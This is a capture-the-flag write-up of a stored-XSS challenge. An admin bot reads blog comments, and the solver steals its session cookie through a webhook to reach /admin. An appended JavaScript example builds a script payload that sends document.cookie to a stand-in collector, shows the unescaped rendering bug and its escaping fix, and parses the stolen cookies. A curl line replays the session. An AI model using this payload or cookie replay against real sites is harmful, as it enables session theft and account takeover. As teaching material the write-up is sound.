Star Wars
Typical XSS challenge.
Description
Author: @congon4tor#2334
If you love Star Wars as much as I do you need to check out this blog!
Solution
On visiting the site, we were welcomed with a login and signup prompt. Trying some SQLi and SSTI on the forms didn't work.
After logging in, we have a site with posts (and comments too!).

Given the sequential numbering of each post, I also tried some IDOR tricks, but it turned out that there are no hidden posts.
When I commented, I received this notification:

Great! Someone (presumably an admin bot) is reading my comment, which is a strong hint that stored XSS is the intended path. Let's fire up a webhook and my favourite XSS payload:
And we got the admin's cookie:

Setting this cookie in the browser logs us in as the admin, and the flag is waiting at the /admin endpoint.
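For anyone following along, here is the technique behind the comment-to-admin chain as an added example (this is not the payload or the challenge code from the original writeup). It shows a cookie-exfiltration payload of the kind used above, the rendering bug that makes it fire (comment body concatenated straight into HTML), the one-line escaping fix, and a helper for reading the cookie out of the webhook callback. The webhook URL, the comment markup and the cookie names are assumptions.

```javascript
// Added example, not from the original writeup. Webhook URL is an assumed collector.
const WEBHOOK = "https://webhook.example/collect";

// Payload a comment would carry. If the admin's browser renders the comment as raw
// HTML, this runs in the admin's origin and ships document.cookie to the collector.
// Caveat: cookies flagged HttpOnly are invisible to document.cookie.
function buildExfilPayload(webhookUrl) {
  return `<script>new Image().src=${JSON.stringify(webhookUrl + "?c=")}` +
         `+encodeURIComponent(document.cookie)</script>`;
}

// Vulnerable rendering: user-controlled body dropped into the page unescaped.
function renderCommentUnsafe(body) {
  return `<div class="comment">${body}</div>`;
}

// Hardened rendering: escape the characters that matter inside an HTML text node.
function escapeHtml(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return s.replace(/[&<>"']/g, (ch) => map[ch]);
}
function renderCommentSafe(body) {
  return `<div class="comment">${escapeHtml(body)}</div>`;
}

// Crude stand-in for "would the admin's browser execute this?": is there a live
// <script> tag left in the rendered HTML? (A real check would use an HTML parser.)
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}

// Parse the callback URL the webhook logs into a cookie-name -> value map.
function parseExfiltratedCookies(requestUrl) {
  const raw = new URL(requestUrl).searchParams.get("c") || "";
  return Object.fromEntries(
    raw.split(";")
       .map((kv) => kv.trim())
       .filter(Boolean)
       .map((kv) => {
         const i = kv.indexOf("=");
         return i < 0 ? [kv, ""] : [kv.slice(0, i), kv.slice(i + 1)];
       })
  );
}

// Demo with a constructed callback (what the webhook would have logged).
const payload = buildExfilPayload(WEBHOOK);
console.log("unsafe render executes payload:", containsScriptTag(renderCommentUnsafe(payload)));
console.log("safe render executes payload:  ", containsScriptTag(renderCommentSafe(payload)));
const constructedHit = WEBHOOK + "?c=" + encodeURIComponent("session=abc123; theme=dark");
console.log("exfiltrated cookies:", parseExfiltratedCookies(constructedHit));
```

Once the callback lands, the `session` value (name assumed here) goes into the browser's cookie jar via devtools, or straight into `curl -b 'session=...' https://<target>/admin`. If the challenge had set HttpOnly on the session cookie, this exact payload would have come back empty and the exfiltration would have needed a different sink, such as fetching /admin from the admin's browser and posting the response body.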